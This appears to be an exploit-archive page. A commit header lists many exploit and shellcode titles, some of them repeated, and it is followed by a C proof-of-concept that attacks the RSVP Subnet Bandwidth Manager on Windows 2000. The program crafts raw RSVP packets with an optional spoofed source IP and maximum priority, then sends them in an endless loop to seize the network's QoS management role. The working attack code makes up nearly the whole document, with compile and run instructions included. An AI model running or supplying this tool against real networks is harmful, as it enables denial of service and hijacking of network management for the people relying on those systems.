880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
281 lines
No EOL
7.1 KiB
C
281 lines
No EOL
7.1 KiB
C
// source: https://www.securityfocus.com/bid/8397/info
|
|
|
|
A problem has been identified in the RSVP Server for Microsoft Windows 2000 that may allow an attacker to hijack management of the network. This could allow an attacker control of network Quality of Service.
|
|
|
|
//Network Penetration
|
|
//www.networkpenetration.com
|
|
//ste jones root@networkpenetration.com
|
|
//
|
|
//Proof of concept code for attack against RSVP / SBM (RFC 2814)
|
|
//compile: gcc rsvp.c -Wall -o RSVP_DoS
|
|
//Allows spoofing of source IP with -s
|
|
//Tested on linux against win2k server
|
|
//You will need to be root to launch the attack as we are using raw sockets
|
|
|
|
/*RSVP
|
|
* Resource ReserVation Protocol Munger
|
|
*
|
|
* multicast IP 224.0.0.17
|
|
* IP protocol number 0x2e for RSVP
|
|
*
|
|
* RSVP Header
|
|
* Version = 4bits
|
|
* flags = 4 bits
|
|
* message type = 8 bits = 67 = I_AM_DSBM
|
|
* RSVP checksum = 16 bits = set to 0's
|
|
* TTL = 8 bits = 1 on multicast
|
|
* Reserved = 8 bits
|
|
* RSVP length = 16 bits
|
|
* + data
|
|
*
|
|
* Data header
|
|
* Length = 16 bits
|
|
* Class = 8 bits
|
|
* type = 8 bits
|
|
* Obj contents
|
|
*/
|
|
|
|
/*
|
|
*Proof of concept - doesn;t check if RSVP priority of server assumes lower
|
|
*/
|
|
#include <netinet/in.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <getopt.h>
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/ip.h>
|
|
#include <netdb.h>
|
|
#include <errno.h>
|
|
#include <string.h>
|
|
#include <arpa/inet.h>
|
|
|
|
void usage(char *progname);
|
|
void startattack(void);
|
|
unsigned short in_chksum(unsigned short *pts, int nbytes);
|
|
|
|
struct rsvphead{
|
|
int flags:4;
|
|
int version:4;
|
|
char type:8;
|
|
int checksum:16;
|
|
char ttl:8;
|
|
char reserved:8;
|
|
int length:16;
|
|
};
|
|
|
|
struct rsvpdata{
|
|
char buf[40];
|
|
};
|
|
|
|
|
|
struct header{
|
|
struct iphdr ip;
|
|
struct rsvphead rhead;
|
|
struct rsvpdata rdata;
|
|
};
|
|
|
|
struct in_addr spoofed;
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
|
|
int c;
|
|
printf("RSVP Munger by Ste Jones from NetworkPenetration.com\n");
|
|
printf("----------------------------------------------------\n");
|
|
opterr = 0; //stop error messages from command line
|
|
while ((c=getopt(argc, argv, "s:")) != -1){
|
|
switch(c){
|
|
case 's': if(!inet_aton(optarg, &spoofed)){
|
|
printf("Malformed IP
|
|
address: %s\n",optarg);
|
|
exit(1);
|
|
}
|
|
break;
|
|
|
|
default: usage(argv[0]);
|
|
exit(1);
|
|
break;
|
|
}
|
|
}
|
|
for(;;){
|
|
startattack();
|
|
}
|
|
exit(0);
|
|
}
|
|
|
|
void startattack(void)
|
|
{
|
|
struct header heada;
|
|
struct sockaddr_in sin;
|
|
int sock;
|
|
int on;
|
|
int sinlen;
|
|
int willing;
|
|
unsigned char *sourceip;
|
|
on = 1;
|
|
willing = 4; //send willing four times then I_AM_DBSM
|
|
printf("\nSending %d I_AM_WILLING packets followed by I_AM_DSBM
|
|
packets every 5 seconds\n\n", willing);
|
|
for(;;){
|
|
|
|
memset(&heada, '\0', sizeof(heada));
|
|
if(willing) printf("Creating I_AM_WILLING packet\n");
|
|
else printf("Creating I_AM_DSBM packet\n");
|
|
|
|
heada.ip.ihl = 5;
|
|
heada.ip.version = 4;
|
|
heada.ip.tos = 0xc0; //same options as set by Microsoft
|
|
RSVP
|
|
if(willing) heada.ip.tot_len = htons(56);
|
|
else heada.ip.tot_len = htons(64);
|
|
heada.ip.id = 0x0000; //checksum calculate later
|
|
heada.ip.frag_off = 0;
|
|
heada.ip.ttl = 1; //multicast uses ttl of 1
|
|
heada.ip.protocol = 0x2e; //RSVP protocol number
|
|
heada.ip.check = 0;
|
|
if(spoofed.s_addr){
|
|
heada.ip.saddr = spoofed.s_addr;
|
|
}
|
|
else heada.ip.saddr = 0; //let kernel decide
|
|
heada.ip.daddr = inet_addr("224.0.0.17");
|
|
|
|
sourceip = (unsigned char *)&heada.ip.saddr;
|
|
|
|
heada.rhead.flags = 0;
|
|
heada.rhead.version = 1;
|
|
if(willing) heada.rhead.type = 0x42; //I_AM_WILLING
|
|
else heada.rhead.type = 0x43; //I_AM_DSBM
|
|
|
|
heada.rhead.checksum= 0x0000; //checksum calculated later
|
|
heada.rhead.ttl = 0x01;
|
|
heada.rhead.reserved= 0x00;
|
|
if(willing) heada.rhead.length = 0x2400;
|
|
else heada.rhead.length = 0x2c00;
|
|
|
|
heada.rdata.buf[0] = 0x00;//length
|
|
heada.rdata.buf[1] = 0x08;//length
|
|
heada.rdata.buf[2] = 0x2a;//0x2a01 = DSBM IP ADDR
|
|
heada.rdata.buf[3] = 0x01;
|
|
heada.rdata.buf[4] = sourceip[0];//IP address
|
|
heada.rdata.buf[5] = sourceip[1];//if not spoofed DSBM IP
|
|
ADDR = 0
|
|
heada.rdata.buf[6] = sourceip[2];//
|
|
heada.rdata.buf[7] = sourceip[3];//
|
|
|
|
heada.rdata.buf[8] = 0x00;//length
|
|
heada.rdata.buf[9] = 0x0c;//length
|
|
heada.rdata.buf[10] = 0xa1;//0a101 = RSVP_HOP_L2, IEEE
|
|
canonical addr
|
|
heada.rdata.buf[11] = 0x01;
|
|
heada.rdata.buf[12] = 0x00; //mac addr
|
|
heada.rdata.buf[13] = 0x11; //
|
|
heada.rdata.buf[14] = 0x22; //
|
|
heada.rdata.buf[15] = 0x33; //
|
|
heada.rdata.buf[16] = 0x44; //
|
|
heada.rdata.buf[17] = 0x55; //
|
|
heada.rdata.buf[18] = 0x00; //
|
|
heada.rdata.buf[19] = 0x00; //
|
|
|
|
heada.rdata.buf[20] = 0x00; //length
|
|
heada.rdata.buf[21] = 0x08; //length
|
|
heada.rdata.buf[22] = 0x2b; // 0x2b01 = SMB_Priority
|
|
heada.rdata.buf[23] = 0x01; //
|
|
heada.rdata.buf[24] = 0x00; //priority
|
|
heada.rdata.buf[25] = 0x00; //priority
|
|
heada.rdata.buf[26] = 0x00; //priority
|
|
if(!willing)heada.rdata.buf[27] = 0xff; //priority 255
|
|
else heada.rdata.buf[27] = 0xff; //priority
|
|
//priority = 255
|
|
//highest possible priority
|
|
//if server has lower priority vulernable to DoS
|
|
|
|
if(!willing){
|
|
heada.rdata.buf[28] = 0x00; //length
|
|
heada.rdata.buf[29] = 0x08; //length
|
|
heada.rdata.buf[30] = 0x2c; //0x2c01 = DSBM timer
|
|
intervals
|
|
heada.rdata.buf[31] = 0x01;
|
|
heada.rdata.buf[32] = 0x00; //retransmit time
|
|
heada.rdata.buf[33] = 0x00; //
|
|
heada.rdata.buf[34] = 0x0f; //0x0f?
|
|
heada.rdata.buf[35] = 0x05; //time 5 seconds
|
|
}
|
|
|
|
heada.ip.check = in_chksum((unsigned short *)&heada.ip,
|
|
20);
|
|
|
|
sin.sin_family = AF_INET;
|
|
sin.sin_port = htons(0);
|
|
sin.sin_addr.s_addr = inet_addr("224.0.0.17");
|
|
|
|
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
|
|
printf("Socket error %s\n",strerror(errno));
|
|
exit(1);
|
|
}
|
|
|
|
if((setsockopt(sock,IPPROTO_IP, IP_HDRINCL, &on, sizeof
|
|
(on))) < 0){
|
|
printf("Setsockopt error %s\n",strerror(errno));
|
|
exit(1);
|
|
}
|
|
|
|
sinlen = sizeof(sin);
|
|
|
|
if(willing){
|
|
if(sendto(sock, &heada, 56, 0, (struct sockaddr *)
|
|
&sin, sinlen) != 56){
|
|
printf("Sento error\n");
|
|
exit(1);
|
|
}
|
|
printf("Sent I_AM_WILLING packet\n");
|
|
}
|
|
|
|
else{
|
|
if(sendto(sock, &heada, 64, 0, (struct sockaddr *)
|
|
&sin, sinlen) != 64){
|
|
printf("Sento error\n");
|
|
exit(1);
|
|
}
|
|
printf("Sent I_AM_DBSM packet\n");
|
|
}
|
|
|
|
close(sock);
|
|
if(willing) willing--;
|
|
sleep(5);
|
|
}
|
|
}
|
|
|
|
void usage(char *progname)
|
|
{
|
|
printf("\n%s\n", progname);
|
|
printf("\t-s <ip address> Spoof source IP address\n");
|
|
printf("\n");
|
|
|
|
exit(1);
|
|
}
|
|
|
|
unsigned short in_chksum(unsigned short *pts, int nbytes)
|
|
{
|
|
register long sum;
|
|
u_short oddbyte;
|
|
register u_short answer;
|
|
|
|
sum = 0;
|
|
while(nbytes > 1){
|
|
sum += *pts++;
|
|
nbytes -=2;
|
|
}
|
|
|
|
if(nbytes == 1){
|
|
oddbyte = 0;
|
|
*((u_char *) &oddbyte) = *(u_char *)pts;
|
|
sum += oddbyte;
|
|
}
|
|
|
|
sum = (sum >> 16) + (sum &0xffff);
|
|
sum += (sum >>16);
|
|
answer = ~sum;
|
|
return(answer);
|
|
} |